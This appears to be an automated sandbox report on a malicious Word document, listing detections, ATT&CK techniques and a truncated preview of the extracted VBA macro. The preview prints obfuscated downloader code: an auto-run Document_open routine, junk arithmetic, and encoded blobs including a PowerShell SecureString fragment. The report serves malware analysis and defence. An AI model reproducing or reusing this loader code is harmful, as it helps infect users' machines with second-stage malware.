MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The VBA script appears to be obfuscated but its structure suggests it's designed to download and execute a second-stage payload, likely from a URL constructed within the script.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43727 bytes |
SHA-256: 3c73c0b3d7758bc846f310f7d57b83eeaf43fcfc6352ebacc5ef93d22e079f39 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 18 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZkHpbFWQzZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
mwSIj _
= ChrB(88236 / Log(36580) / 66119 _
+ 42204)
jZuuwd = 65557 _
/ CBool(uKoSK) / 74 + CSng(XVvtw) - _
(MVhAU * HbYvIW)
Application.Run jOAIz + "KVMEBNR" + UiUEb, UmJkNw + EXLoFEuzA + jNUOr
ZVVGww _
= ChrB(4487 / Log(33402) / 33170 _
+ 52068)
XMzidZ = 83753 _
/ CBool(FXAqz) / 74 + CSng(KwjmnP) - _
(IOXtw * VFZLCK)
End Sub
Attribute VB_Name = "NBBvFndzl"
Sub ZfYOo(TidLu)
zZkfz _
= ChrB(41465 / Log(22489) / 62112 _
+ 22679)
fjdJvn = 63189 _
/ CBool(mCWsw) / 74 + CSng(aNhDG) - _
(ZzTzDb * aqHlF)
End Sub
Function EXLoFEuzA()
On Error Resume Next
qpdfI _
= ChrB(95341 / Log(24541) / 82769 _
+ 32718)
JRPci = 15903 _
/ CBool(jQVoBH) / 74 + CSng(QWdaC) - _
(XTBvfc * loINb)
zPaOXQMXokc = fXKatE("DfAA5ADUAMwAwADUAMQBhADMANgBjADEAMwA3AGUAZABkADQAZABjAGMAZQA2AGUANgBjAGMAMgA3ADcAYQAzADQAMgAzADgAZAA0ADgAYQA3ADkAZgAxA8Ss@", nNCNR - nNCNR + 3 + nNCNR - nNCNR, nNCNR - nNCNR + 116 + nNCNR - nNCNR)
fmtjEj _
= ChrB(76723 / Log(80966) / 15975 _
+ 89496)
QoiOO = 72032 _
/ CBool(momvp) / 74 + CSng(TzCrw) - _
(HHMPcc * qZtOo)
KNFzSc _
= ChrB(56778 / Log(14791) / 4426 _
+ 58037)
bNpTYt = 70080 _
/ CBool(zNLoA) / 74 + CSng(ESrKah) - _
(bwGaL * pRFFAZ)
VBwOwEAS = fXKatE("h0w8GIANQBmMzYR4", Zuiqu - Zuiqu + 5 + Zuiqu - Zuiqu, Zuiqu - Zuiqu + 7 + Zuiqu - Zuiqu)
fKKDj _
= ChrB(50714 / Log(70274) / 88603 _
+ 42197)
zYFJN = 17968 _
/ CBool(wbzKzQ) / 74 + CSng(sMLuHr) - _
(KPzIt * obAwZ)
WBZTU _
= ChrB(38168 / Log(33541) / 78845 _
+ 88360)
RNJwGQ = 18721 _
/ CBool(BNmLwq) / 74 + CSng(hJnKjA) - _
(ONWzz * nCVJhI)
izuwhn = fXKatE("aY6MANABhAGEANgA2ADUAMwBjADUANQAzADEAYwA0ADQAOAA5ADkAOQAwADYAZQA1ADYAMwA1AGMAZgAyADkANQA5ADkANgA1ADgANwA1ADYANwA0ADEAMgBlADgAZAA4ADEsww7", jGBGY - jGBGY + 4 + jGBGY - jGBGY, jGBGY - jGBGY + 129 + jGBGY - jGBGY)
vpVKL _
= ChrB(25865 / Log(88887) / 10236 _
+ 92211)
KDicm = 20232 _
/ CBool(iKwwzw) / 74 + CSng(JSUFws) - _
(iqVurn * zWGPSw)
ZLaXS _
= ChrB(85408 / Log(70798) / 67317 _
+ 3808)
zkLwXN = 10298 _
/ CBool(EQsRqj) / 74 + CSng(LPFzl) - _
(IsRaXr * zBsBn)
pQzcW = fXKatE("Us0QA5ADAAZQA2ADAANABjADQAMQAzADgAYwA2AGUAYQA5AGMANgA0ADkAYQBmADYAZgAwADgANQBlAGIAZAAvFs%", tONAs - tONAs + 4 + tONAs - tONAs, tONAs - tONAs + 82 + tONAs - tONAs)
lQrtB _
= ChrB(37914 / Log(21178) / 2189 _
+ 86954)
jIUuP = 12961 _
/ CBool(fjQirs) / 74 + CSng(XAVlkC) - _
(qdfur * WDjav)
WozEO _
= ChrB(7505 / Log(48655) / 40053 _
+ 81916)
DXPRj = 53829 _
/ CBool(oJXJbE) / 74 + CSng(IlmwJG) - _
(KJdRZ * cqPMup)
MDDBL = fXKatE("8DZIAMgBmADkAYwBjADQANQBiAGEAYQBlADMAYwA5ADcAMAAxADUAMAA0AGEAZgA5ADUAZgBmAE88", fkSCw - fkSCw + 5 + fkSCw - fkSCw, fkSCw - fkSCw + 70 + fkSCw - fkSCw)
OmXzUw _
= ChrB(88047 / Log(65756) / 6495 _
+ 16752)
vkRvd = 33882 _
/ CBool(LjztOl) / 74 + CSng(JiXwu) - _
(OmMUW * odMMZ)
iEjinM _
= ChrB(76345 / Log(33772) / 6453 _
+ 26383)
obkvzz = 29648 _
/ CBool(FZdZLr) / 74 + CSng(dPmNlj) - _
(jJjBn * ziAmHv)
DGNjDUp = fXKatE("@PmL]::PTRTOStRinGBstR( [rUntiMe.InTeRopSErViCes.MaRShal]::seCuresTringToBsTr( $('76492d1116743f0423413b16050a5345MgB8AEgAegA5AEUAbwBRAEgAaYLap", AVVpj - AVVpj + 4 + AVVpj - AVVpj, AVVpj - AVVpj + 136 + AVVpj - AVVpj)
loRbG _
= ChrB(66713 / Log(73093) / 66189 _
+ 23017)
fUqBi = 47144 _
/ CBool(pcDfrb) / 74 + CSng(wKTrX) - _
(qRQiA * zKHCua)
SfoXlJ _
= ChrB(77763 / Log(68964) / 41370 _
+ 53329)
ZdIfDj = 61928 _
/ CBool(dijHUi) / 74 + CSng(iSAjLv) - _
(BCCLqU * lpYLW)
lmCdws = fXKatE("4zAwADYAZABkADQAZgAwAGEAOQAyADUAZABhADMANwAyADEAZABkADgAYgA2ADYAMQAxADUAYgBlADMAMQA3AGYANwAwADIa3QahVM", IAjwv - IAjwv + 3 + IAjwv - IAjwv, IAjwv - IAjwv + 93 + IAjwv - IAjwv)
OJSjk _
= ChrB(90504 / Log(81536) / 50477 _
+ 20051)
YTspbV = 67384 _
/ CBool(PtobGc) / 74 + CSng(qLQstI) - _
(wWhYAU * QFKrQi)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.